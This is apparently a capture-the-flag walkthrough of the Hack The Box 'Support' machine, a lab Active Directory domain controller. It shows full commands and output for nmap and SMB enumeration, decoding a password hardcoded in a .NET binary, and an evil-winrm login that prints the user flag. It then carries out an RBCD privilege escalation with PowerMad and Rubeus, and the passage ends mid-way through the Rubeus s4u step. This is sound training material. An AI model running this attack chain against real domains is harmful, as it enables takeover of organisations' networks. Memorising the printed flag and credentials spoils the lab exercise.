Run a nmap scan
nmap -sC -sV -Pn -v 10.129.233.185
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-12-10 19:16:47Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-12-10T19:16:58
|_ start_date: N/A
nmap -sC -sV -Pn -v -p- -T4 --min-rate=1000 10.129.233.185
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-12-11 08:53:21Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49678/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49690/tcp open msrpc Microsoft Windows RPC
49707/tcp open msrpc Microsoft Windows RPC
64625/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: -1s
| smb2-time:
| date: 2024-12-11T08:54:14
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
The Nmap scan reveals numerous open ports, indicating that the underlying operating system is likely Windows. Among the open ports, the most notable ones are 389 (LDAP), 636 (LDAPS), 445 (SMB), and 5985 (WinRM). Since no web server is running on any of the detected ports and this appears to be a Windows system, we’ll proceed to check for any accessible SMB shares.
└─$ smbclient -L //10.129.233.185
Password for [WORKGROUP\kali]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
support-tools Disk support staff tools
SYSVOL Disk Logon server share
<SNIP>
Among the available shares, support-tools stands out as it is not a default share. Let’s try connecting to it and listing the files it contains.
└─$ smbclient //10.129.233.185/support-tools
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Jul 20 13:01:06 2022
.. D 0 Sat May 28 07:18:25 2022
7-ZipPortable_21.07.paf.exe A 2880728 Sat May 28 07:19:19 2022
npp.8.4.1.portable.x64.zip A 5439245 Sat May 28 07:19:55 2022
putty.exe A 1273576 Sat May 28 07:20:06 2022
SysinternalsSuite.zip A 48102161 Sat May 28 07:19:31 2022
UserInfo.exe.zip A 277499 Wed Jul 20 13:01:07 2022
windirstat1_1_2_setup.exe A 79171 Sat May 28 07:20:17 2022
WiresharkPortable64_3.6.5.paf.exe A 44398000 Sat May 28 07:19:43 2022
We successfully connected to the share anonymously and listed its contents. The share includes several application installers, such as PuTTY and Wireshark, but one file stands out: UserInfo.exe.zip. This doesn’t appear to be a well-known application. Let’s download it locally for further investigation.
smb: \> get UserInfo.exe.zip
getting file \UserInfo.exe.zip of size 277499 as UserInfo.exe.zip (267.5 KiloBytes/sec) (average 267.5 KiloBytes/sec)
Once the archive has been downloaded, disconnect from the SMB share and extract its contents by unzipping the file.
└─$ unzip UserInfo.exe.zip
Archive: UserInfo.exe.zip
inflating: UserInfo.exe
inflating: CommandLineParser.dll
inflating: Microsoft.Bcl.AsyncInterfaces.dll
inflating: Microsoft.Extensions.DependencyInjection.Abstractions.dll
inflating: Microsoft.Extensions.DependencyInjection.dll
inflating: Microsoft.Extensions.Logging.Abstractions.dll
inflating: System.Buffers.dll
inflating: System.Memory.dll
inflating: System.Numerics.Vectors.dll
inflating: System.Runtime.CompilerServices.Unsafe.dll
inflating: System.Threading.Tasks.Extensions.dll
inflating: UserInfo.exe.config
The archive contains several DLL files along with an executable named UserInfo.exe. Checking the file type reveals that it is a .NET executable. Since we are working on a Linux system, we have two options: decompiling the executable to analyse its functionality or using Wine to attempt running it.
└─$ file UserInfo.exe
UserInfo.exe: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows, 3 sections
ILSpy
To decompile the .NET executable, we can use Avalonia ILSpy, a cross-platform version of ILSpy compatible with Linux. You can download the latest release from the AvaloniaILSpy Releases page.
wget https://github.com/icsharpcode/AvaloniaILSpy/releases/download/v7.2-rc/Linux.x64.Release.zip
Then we will have to extract the contents using unzip.
unzip Linux.x64.Release.zip
The archive will extract a second archive, which we must again unzip.
unzip ILSpy-linux-x64-Release.zip
Once the archive is extracted, navigate to the artifacts/linux-arm64
folder and run the ILSpy executable. Use the following commands:
cd artifacts/linux-x64
sudo ./ILSpy
Let’s load the UserInfo.exe file to decompile it. Go to File, choose Open, locate the target binary in the file browser, and select it.
Once the binary is imported, ILSpy will automatically handle the decompilation, allowing us to view the source code. Upon reviewing the code, we quickly notice a function named LdapQuery alongside two other functions called FindUser and GetUser.
public LdapQuery()
{
string password = Protected.getPassword();
entry = new DirectoryEntry("LDAP://support.htb", "support\\ldap", password);
entry.set_AuthenticationType((AuthenticationTypes)1);
ds = new DirectorySearcher(entry);
}
The code reveals that the binary connects to a remote LDAP server to retrieve user information. To proceed, we’ll add support.htb to our hosts file.
echo '10.129.233.185 support.htb' | sudo tee -a /etc/hosts
The password required to authenticate with the LDAP server is retrieved from the Protected.getPassword() function.
The code for this function is:
internal class Protected
{
private static string enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E";
private static byte[] key = Encoding.ASCII.GetBytes("armando");
public static string getPassword()
{
byte[] array = Convert.FromBase64String(enc_password);
byte[] array2 = array;
for (int i = 0; i < array.Length; i++)
{
array2[i] = (byte)((uint)(array[i] ^ key[i % key.Length]) ^ 0xDFu);
}
return Encoding.Default.GetString(array2);
}
}
The password appears to be encrypted using XOR, and the decryption process is as follows:
- The
enc_password
string is Base64-decoded and stored in a byte array namedarray
. - A second byte array,
array2
, is created with the same values asarray
. - A loop is initiated to iterate through each character in
array
. Each character is XORed with a letter from the key and then with the byte0xDFu
(223). - Once the loop completes, the decrypted password is returned.
Let's create a Python script that performs the decryption process.
import base64
from itertools import cycle
# Base64 encoded encrypted password
enc_password = base64.b64decode("0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E")
# Key and additional XOR value
key = b"armando"
key2 = 223
# Initialize result string
res = ''
# Decrypt using XOR with key and key2
for e, k in zip(enc_password, cycle(key)):
res += chr(e ^ k ^ key2)
# Print the decrypted password
print(res)
Save the above code into decrypt.py and run it.
└─$ python3 decrypt.py
nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
The script successfully prints the decrypted password, allowing us to proceed with connecting to the LDAP server to gather further information.
Wine
Another way to examine the functionality of UserInfo.exe is by using Wine, a tool that enables Windows applications to run on Linux systems. This allows us to execute the program directly and observe its behaviour.
└─$ wine UserInfo.exe
Usage: UserInfo.exe [options] [commands]
Options:
-v|--verbose Verbose output
Commands:
find Find a user
user Get information about a user
Running the binary with Wine displays its command-line usage. Let’s try using the find flag to explore its functionality.
└─$ wine UserInfo.exe -v find
[-] At least one of -first or -last is required.
The program indicates that a -first or -last flag is also required. Let’s include one.
└─$ wine UserInfo.exe -v find -first "test"
[*] LDAP query to use: (givenName=test)
[-] Exception: No Such Object
Note: If we haven’t already added support.htb
to our hosts file, the binary will throw a "Connect error" message. There are several methods to identify or even guess the hostname without using ILSpy, such as using Wireshark or running the strings
command on Windows.
The binary appears to have successfully connected to the remote LDAP server and displays the LDAP query being executed. However, the test object is not found. A few additional attempts to locate other objects are also unsuccessful.
We could try injecting an LDAP query to list all objects, but this approach also fails.
└─$ wine UserInfo.exe -v find -first "*"
[*] LDAP query to use: (givenName=*)
[-] Exception: No Such Object
Note: The binary is, in fact, vulnerable to LDAP query injection, but this only works on a Windows system.
The earlier failures might stem from Wine being imperfect software, causing the binary to fail during execution, preventing it from identifying the names correctly. However, we know the binary is connecting to the remote LDAP server on the target machine and successfully authenticating.
To investigate further, let’s launch Wireshark to capture the network traffic and attempt to extract the username and password used for authentication. Start Wireshark and begin capturing packets on the tun0
interface. Then, rerun the binary with Wine as demonstrated earlier.
The LDAP authentication details are successfully captured in Wireshark. By examining the bindRequest
packet, we can view the username and password combination being used.
To do this, navigate to Lightweight Directory Access Protocol in the packet details, expand protocolOp, and then open bindRequest to identify the username, which is support\ldap
. Finally, expand the authentication field to reveal the password: nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
Foothold
With the credentials acquired, let's connect to the LDAP server to explore for any potentially interesting information. We'll use the ldapsearch
utility to connect, so let's begin by installing it.
sudo apt install ldap-utils
Once the utility is installed, we'll attempt to bind to the LDAP server using ldap@support.htb
as the BindDN with the -D
flag, and specify support
and htb
as the Domain Components using the -b
flag.
└─$ ldapsearch -H ldap://support.htb -D ldap@support.htb -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b "dc=support,dc=htb" "(cn=Administrator)"
=htb" "(cn=Administrator)"
# extended LDIF
#
# LDAPv3
# base <dc=support,dc=htb> with scope subtree
# filter: (cn=Administrator)
# requesting: ALL
#
# Administrator, Users, support.htb
dn: CN=Administrator,CN=Users,DC=support,DC=htb
<SNIP>
└─$ ldapsearch -H ldap://support.htb -D ldap@support.htb -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b "dc=support,dc=htb" "(objectclass=*)"
# extended LDIF
#
# LDAPv3
# base <dc=support,dc=htb> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#
# support.htb
dn: DC=support,DC=htb
<SNIP>
# Users, support.htb
dn: CN=Users,DC=support,DC=htb
<SNIP>
# Computers, support.htb
dn: CN=Computers,DC=support,DC=htb
<SNIP>
When connecting to an LDAP server, the BindDN can be thought of as a type of username or account used to establish the connection, granting the necessary permissions to view and modify objects within the LDAP directory.
The Domain Components, on the other hand, function like a directory structure in LDAP. They are read from right to left and guide the server on where to look and which objects to retrieve. In this example, the server was directed to navigate to the htb
domain component, locate the support
domain component, and then search for any objects within it named Administrator
.
The command produced a large amount of data, indicating that the connection was successful.
Apache Directory Studio
Instead of using ldapsearch, you can opt for the Apache Directory Studio application, which can be downloaded from here. This tool offers a graphical interface, making it easier to view LDAP data efficiently. Simply download it to your device and run the application.
Extract the tar archive, change into ApacheDirectoryStudio
and start the Apache directory Studio
tar -xvzf ApacheDirectoryStudio-2.0.0.v20210717-M17-linux.gtk.x86_64.tar.gz
cd ApacheDirectoryStudio
sudo ./ApacheDirectoryStudio
Next, add a connection to the LDAP server by selecting the LDAP button located at the top left of the screen.
On the new page, right-click anywhere within the Connections window and choose New Connection.
Enter Support as the connection name, support.htb as the hostname, and then click Next.
In the following window, select Simple Authentication as the authentication method. Set the Bind DN to ldap@support.htb and enter the password nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz in the Bind password field. Click the Check Authentication button to verify that everything is working correctly.
If the authentication is successful, click OK and then select Finish.
On the home screen of the Apache Directory Studio utility, you'll find the Support connection in the bottom left corner. Double-clicking it will establish a connection to the remote LDAP server and display all the LDAP objects.
After opening DC=support,DC=htb, you will notice an object with the Common Name of users. This object contains all the system users on the remote machine. Open it to continue enumerating further.
Among the users listed, one stands out: support. Examining this user's properties reveals a non-default tag called info with the value Ironside47pleasure40Watchful, which resembles a password. Additionally, this user is a member of the Remote Management Users group, granting them permission to connect via WinRM.
With this information, let's use evil-winrm to attempt a remote connection to the support user using the identified password.
└─$ evil-winrm -u support -p 'Ironside47pleasure40Watchful' -i support.htb
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\support\Documents> whoami
support\support
The connection is successful, and the user flag can be located in C:\Users\Support\Desktop
.
*Evil-WinRM* PS C:\Users\support\Desktop> ls
Directory: C:\Users\support\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 12/10/2024 11:14 AM 34 user.txt
*Evil-WinRM* PS C:\Users\support\Desktop> cat user.txt
f7ed57ac4a618b59b103f5adf6ff9f29
*Evil-WinRM* PS C:\Users\support\Desktop> ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : dc
Primary Dns Suffix . . . . . . . : support.htb
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : support.htb
.htb
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : .htb
Description . . . . . . . . . . . : vmxnet3 Ethernet Adapter
Physical Address. . . . . . . . . : 00-50-56-B9-AA-23
DHCP Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
IPv4 Address. . . . . . . . . . . : 10.129.235.164(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Lease Obtained. . . . . . . . . . : Tuesday, December 10, 2024 11:13:37 AM
Lease Expires . . . . . . . . . . : Tuesday, December 10, 2024 5:13:37 PM
Default Gateway . . . . . . . . . : 10.10.10.2
10.129.0.1
DHCP Server . . . . . . . . . . . : 10.129.0.1
DNS Servers . . . . . . . . . . . : 127.0.0.1
NetBIOS over Tcpip. . . . . . . . : Enabled
Privilege Escalation
The Nmap output has already shown us that the machine is part of a Domain. We can gather more details about the domain using the Active Directory PowerShell module, which is typically pre-installed on Domain Controllers.
*Evil-WinRM* PS C:\Users\support\Desktop> Get-ADDomain
AllowedDNSSuffixes : {}
ChildDomains : {}
ComputersContainer : CN=Computers,DC=support,DC=htb
DeletedObjectsContainer : CN=Deleted Objects,DC=support,DC=htb
DistinguishedName : DC=support,DC=htb
DNSRoot : support.htb
DomainControllersContainer : OU=Domain Controllers,DC=support,DC=htb
DomainMode : Windows2016Domain
DomainSID : S-1-5-21-1677581083-3380853377-188903654
ForeignSecurityPrincipalsContainer : CN=ForeignSecurityPrincipals,DC=support,DC=htb
Forest : support.htb
InfrastructureMaster : dc.support.htb
LastLogonReplicationInterval :
LinkedGroupPolicyObjects : {CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=support,DC=htb}
LostAndFoundContainer : CN=LostAndFound,DC=support,DC=htb
ManagedBy :
Name : support
NetBIOSName : SUPPORT
ObjectClass : domainDNS
ObjectGUID : 553cd9a3-86c4-4d64-9e85-5146a98c868e
ParentDomain :
PDCEmulator : dc.support.htb
PublicKeyRequiredPasswordRolling : True
QuotasContainer : CN=NTDS Quotas,DC=support,DC=htb
ReadOnlyReplicaDirectoryServers : {}
ReplicaDirectoryServers : {dc.support.htb}
RIDMaster : dc.support.htb
SubordinateReferences : {DC=ForestDnsZones,DC=support,DC=htb, DC=DomainDnsZones,DC=support,DC=htb, CN=Configuration,DC=support,DC=htb}
SystemsContainer : CN=System,DC=support,DC=htb
UsersContainer : CN=Users,DC=support,DC=htb
The machine is indeed the Domain Controller (dc.support.htb) for the support.htb domain. Let’s add this hostname to our hosts file.
echo '10.129.233.185 dc.support.htb' | sudo tee -a /etc/hosts
We can also verify whether the current user belongs to any notable or potentially interesting groups.
*Evil-WinRM* PS C:\Users\support\Documents> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============================================= ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
SUPPORT\Shared Support Accounts Group S-1-5-21-1677581083-3380853377-188903654-1103 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
The support user appears to be a member of a non-default group called Shared Support Accounts, in addition to the Authenticated Users group. To identify potential attack paths within this domain that could help escalate privileges, we can use BloodHound.
First, let’s start the Neo4j database, which is a prerequisite for BloodHound.
sudo neo4j start
Next, start the bloodhound.
bloodhound
We’ll use the SharpHound.exe
binary to gather Active Directory data. This binary is part of the BloodHound project and is located in the BloodHound/Collectors/
directory.
To proceed, we can upload the binary using the previously established Evil-WinRM session.
*Evil-WinRM* PS C:\Users\support\Documents> upload SharpHound.exe
Info: Uploading /home/kali/Tools/SharpHound.exe to C:\Users\support\Documents\SharpHound.exe
Data: 1402880 bytes of 1402880 bytes copied
Info: Upload successful!
Once the binary has been uploaded, we can proceed to execute it. This will begin the process of collecting Active Directory data for analysis in BloodHound.
*Evil-WinRM* PS C:\Users\support\Documents> .\SharpHound.exe
2024-12-10T19:55:01.0889980-08:00|INFORMATION|This version of SharpHound is compatible with the 4.3.1 Release of BloodHound
2024-12-10T19:55:01.2608106-08:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-12-10T19:55:01.2927368-08:00|INFORMATION|Initializing SharpHound at 7:55 PM on 12/10/2024
2024-12-10T19:55:01.5576793-08:00|INFORMATION|[CommonLib LDAPUtils]Found usable Domain Controller for support.htb : dc.support.htb
2024-12-10T19:55:01.7139588-08:00|INFORMATION|Flags: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-12-10T19:55:02.0108287-08:00|INFORMATION|Beginning LDAP search for support.htb
2024-12-10T19:55:02.0889288-08:00|INFORMATION|Producer has finished, closing LDAP channel
2024-12-10T19:55:02.0889288-08:00|INFORMATION|LDAP channel closed, waiting for consumers
2024-12-10T19:55:32.4014671-08:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 36 MB RAM
2024-12-10T19:55:46.8076678-08:00|INFORMATION|Consumers finished, closing output channel
2024-12-10T19:55:46.8701700-08:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2024-12-10T19:55:47.1670478-08:00|INFORMATION|Status: 108 objects finished (+108 2.4)/s -- Using 44 MB RAM
2024-12-10T19:55:47.1670478-08:00|INFORMATION|Enumeration finished in 00:00:45.1591069
2024-12-10T19:55:47.2607988-08:00|INFORMATION|Saving cache with stats: 67 ID to type mappings.
67 name to SID mappings.
0 machine sid mappings.
2 sid to domain mappings.
0 global catalog mappings.
2024-12-10T19:55:47.2764187-08:00|INFORMATION|SharpHound Enumeration Completed at 7:55 PM on 12/10/2024! Happy Graphing!
After execution is complete, a ZIP file containing the collected Active Directory data will be generated in the same directory. This file can be used for further analysis in BloodHound.
*Evil-WinRM* PS C:\Users\support\Documents> ls
Directory: C:\Users\support\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 12/10/2024 7:55 PM 12345 20241210195546_BloodHound.zip
-a---- 12/10/2024 7:53 PM 1052160 SharpHound.exe
-a---- 12/10/2024 7:55 PM 10022 YzgyNDA2MjMtMDk1ZC00MGYxLTk3ZjUtMmYzM2MzYzVlOWFi.bin
The ZIP file contains all the gathered Active Directory data. Let’s download it using the Evil-WinRM session for further analysis in BloodHound.
*Evil-WinRM* PS C:\Users\support\Documents> download 20241210195546_BloodHound.zip
Info: Downloading C:\Users\support\Documents\20241210195546_BloodHound.zip to 20241210195546_BloodHound.zip
Info: Download successful!
After downloading the ZIP file, simply drag and drop it into the BloodHound window to load the collected data. Once the data is loaded, search for SUPPORT@SUPPORT.HTB
in the top-left search bar to locate the current user. Right-click on the user object and select Mark User as Owned to indicate that we already have access to the system as this user.
The user details will be visible in the top-left corner, just below the search bar, once the user is selected.
The overview includes details about the user’s group memberships, objects in the domain that the user controls, and other critical information. Notably, the Group Delegated Object Control section displays a value of 1, indicating that one of the groups our user is a member of has access to control certain objects in the domain. Let’s click on this section to view more details.
The output confirms that the Shared Support Accounts group has GenericAll privileges on the Domain Controller. Since the support user is a member of this group, they also inherit full privileges on the DC.
By right-clicking on the GenericAll line and selecting Help, we can access additional information about this privilege, including guidance on how to exploit it effectively.
BloodHound indicates that, due to the GenericAll privilege, it is possible to perform a Resource-Based Constrained Delegation (RBCD) attack. This attack can be leveraged to escalate our privileges within the domain.
Resource-Based Constrained Delegation (RBCD)
In summary, an RBCD attack allows us to add a computer under our control to the domain (e.g., $FAKE-COMP01
) and configure the Domain Controller (DC) to allow this computer to act on its behalf. By impersonating the DC, we can request Kerberos tickets for $FAKE-COMP01
with the ability to impersonate a highly privileged user in the domain, such as the Administrator. Using these Kerberos tickets, we can execute a Pass the Ticket (PtT) attack to authenticate as the privileged user, gaining full control over the domain.
Prerequisites for the attack:
- A shell or code execution as a domain user belonging to the Authenticated Users group. By default, members of this group can add up to 10 computers to the domain.
- The
ms-ds-machineaccountquota
attribute must be greater than0
. This attribute determines how many computers an authenticated domain user can add to the domain. - The current user (or a group the user belongs to) must have WRITE privileges (
GenericAll
orWriteDACL
) over a domain-joined computer (in this case, the Domain Controller).
From enumeration:
- The
support
user belongs to both the Authenticated Users group and the Shared Support Accounts group. - The Shared Support Accounts group has GenericAll privileges over the Domain Controller (
dc.support.htb
).
Next, let’s check the value of the ms-ds-machineaccountquota
attribute to ensure we can proceed with the attack.
*Evil-WinRM* PS C:\Users\support\Documents> Get-ADObject -Identity (Get-ADDomain).DistinguishedName -Properties "ms-DS-MachineAccountQuota"
DistinguishedName : DC=support,DC=htb
ms-DS-MachineAccountQuota : 10
Name : support
ObjectClass : domainDNS
ObjectGUID : 553cd9a3-86c4-4d64-9e85-5146a98c868e
The result of the previous command indicates that this attribute is set to 10, allowing each authenticated domain user to join up to 10 computers to the domain.
Next, we’ll confirm that the msds-allowedtoactonbehalfofotheridentity
attribute is empty. To achieve this, we’ll need the PowerView module for PowerShell. This can be uploaded to the server using Evil-WinRM, as demonstrated earlier. Once uploaded, we can import the module using the following command.
*Evil-WinRM* PS C:\Users\support\Documents> upload PowerView.ps1
<SNIP>
*Evil-WinRM* PS C:\Users\support\Documents> powershell -ep bypass
<SNIP>
*Evil-WinRM* PS C:\Users\support\Documents> . .\PowerView.ps1
After importing the module, we can use the Get-DomainComputer
cmdlet to retrieve the necessary information.
*Evil-WinRM* PS C:\Users\support\Documents> Get-DomainComputer DC | select name, msds-allowedtoactonbehalfofotheridentity
name msds-allowedtoactonbehalfofotheridentity
---- ----------------------------------------
DC
The value is empty, indicating that we are ready to proceed with the RBCD attack. However, before starting, we need to upload the necessary tools. These include PowerMad and Rubeus, which can be uploaded using Evil-WinRM as demonstrated earlier. PowerMad can then be imported with the following command.
*Evil-WinRM* PS C:\Users\support\Documents> upload Powermad.ps1
<SNIP>
*Evil-WinRM* PS C:\Users\support\Documents> upload Rubeus.exe
<SNIP>
*Evil-WinRM* PS C:\Users\support\Documents> . .\Powermad.ps1
Creating a Computer Object
Now, let’s create a fake computer and add it to the domain using PowerMad's New-MachineAccount
cmdlet.
*Evil-WinRM* PS C:\Users\support\Documents> New-MachineAccount -MachineAccount FAKE-COMP01 -Password $(ConvertTo-SecureString 'Password123' -AsPlainText -Force)
[+] Machine account FAKE-COMP01 added
The command successfully added a machine named FAKE-COMP01
to the domain with the password Password123
. We can confirm the addition of this new machine using the following command.
*Evil-WinRM* PS C:\Users\support\Documents> Get-ADComputer -identity FAKE-COMP01
DistinguishedName : CN=FAKE-COMP01,CN=Computers,DC=support,DC=htb
DNSHostName : FAKE-COMP01.support.htb
Enabled : True
Name : FAKE-COMP01
ObjectClass : computer
ObjectGUID : 96ccb0ab-874b-4a52-954f-c807ff618204
SamAccountName : FAKE-COMP01$
SID : S-1-5-21-1677581083-3380853377-188903654-6101
UserPrincipalName :
The output displays the details of FAKE-COMP01
, including the assigned SID value, which is clearly visible.
Configuring RBCD
Next, we need to configure Resource-Based Constrained Delegation (RBCD). This can be done in one of two ways:
- Use the built-in PowerShell Active Directory module to set the
PrincipalsAllowedToDelegateToAccount
value toFAKE-COMP01
. This will automatically configure themsds-allowedtoactonbehalfofotheridentity
attribute. - Alternatively, use the PowerView module to directly set the
msds-allowedtoactonbehalfofotheridentity
attribute.
For this walkthrough, we’ll use the first method as it is simpler to understand. We’ll use the Set-ADComputer
command to configure RBCD.
*Evil-WinRM* PS C:\Users\support\Documents> Set-ADComputer -Identity DC -PrincipalsAllowedToDelegateToAccount FAKE-COMP01$
To confirm that the command was successful, we can use the Get-ADComputer
command.
*Evil-WinRM* PS C:\Users\support\Documents> Get-ADComputer -Identity DC -Properties PrincipalsAllowedToDelegateToAccount
DistinguishedName : CN=DC,OU=Domain Controllers,DC=support,DC=htb
DNSHostName : dc.support.htb
Enabled : True
Name : DC
ObjectClass : computer
ObjectGUID : afa13f1c-0399-4f7e-863f-e9c3b94c4127
PrincipalsAllowedToDelegateToAccount : {CN=FAKE-COMP01,CN=Computers,DC=support,DC=htb}
SamAccountName : DC$
SID : S-1-5-21-1677581083-3380853377-188903654-1000
UserPrincipalName :
As shown, the PrincipalsAllowedToDelegateToAccount
is now set to FAKE-COMP01
, confirming that the command worked. We can also verify the value of the msds-allowedtoactonbehalfofotheridentity
attribute to ensure it has been correctly configured.
*Evil-WinRM* PS C:\Users\support\Documents> Get-DomainComputer DC | select msds-allowedtoactonbehalfofotheridentity
msds-allowedtoactonbehalfofotheridentity
----------------------------------------
{1, 0, 4, 128...}
As observed, the msds-allowedtoactonbehalfofotheridentity
attribute now contains a value. However, since this attribute is of type Raw Security Descriptor, we need to convert the bytes into a readable string format to interpret it.
To start, let’s extract the value and store it in a variable named RawBytes
.
*Evil-WinRM* PS C:\Users\support\Documents> $RawBytes = Get-DomainComputer DC -Properties 'msds-allowedtoactonbehalfofotheridentity' | select -expand msds-allowedtoactonbehalfofotheridentity
Next, we’ll convert the bytes stored in RawBytes
into a Raw Security Descriptor object for easier interpretation.
*Evil-WinRM* PS C:\Users\support\Documents> $Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RawBytes, 0
Finally, we can display the entire security descriptor, along with the DiscretionaryAcl
class. The DiscretionaryAcl
represents the Access Control List (ACL) that defines which machines are allowed to act on behalf of the domain controller.
*Evil-WinRM* PS C:\Users\support\Documents> $Descriptor
ControlFlags : DiscretionaryAclPresent, SelfRelative
Owner : S-1-5-32-544
Group :
SystemAcl :
DiscretionaryAcl : {System.Security.AccessControl.CommonAce}
ResourceManagerControl : 0
BinaryLength : 80
*Evil-WinRM* PS C:\Users\support\Documents> $Descriptor.DiscretionaryAcl
BinaryLength : 36
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 983551
SecurityIdentifier : S-1-5-21-1677581083-3380853377-188903654-6101
AceType : AccessAllowed
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None
From the output, we can confirm that the SecurityIdentifier
matches the SID of FAKE-COMP01
observed earlier, and the AceType
is set to AccessAllowed
.
Performing a S4U Attack
We are now ready to carry out the S4U attack, which will enable us to obtain a Kerberos ticket on behalf of the Administrator. To execute this attack, we will use Rubeus.
The first step is to obtain the hash of the password that was used to create the computer object.
\*Evil-WinRM* PS C:\Users\support\Documents>.\Rubeus.exe hash /password:Password123 /user:FAKE-COMP01$ /domain:support.htb
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.0
[*] Action: Calculate Password Hash(es)
[*] Input password : Password123
[*] Input username : FAKE-COMP01$
[*] Input domain : support.htb
[*] Salt : SUPPORT.HTBhostfake-comp01.support.htb
[*] rc4_hmac : 58A478135A93AC3BF058A5EA0E8FDB71
[*] aes128_cts_hmac_sha1 : 06C1EABAD3A21C24DF384247BC85C540
[*] aes256_cts_hmac_sha1 : FF7BA224B544AA97002B2BEE94EADBA7855EF81A1E05B7EB33D4BCD55807FF53
[*] des_cbc_md5 : 5B045E854358687C
We need to extract the value of rc4_hmac
. Once we have this, we can proceed to generate Kerberos tickets for the Administrator.
*Evil-WinRM* PS C:\Users\support\Documents> .\Rubeus.exe s4u /user:FAKE-COMP01$ /rc4:58A478135A93AC3BF058A5EA0E8FDB71 /impersonateuser:Administrator /msdsspn:cifs/dc.support.htb /domain:support.htb /ptt
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
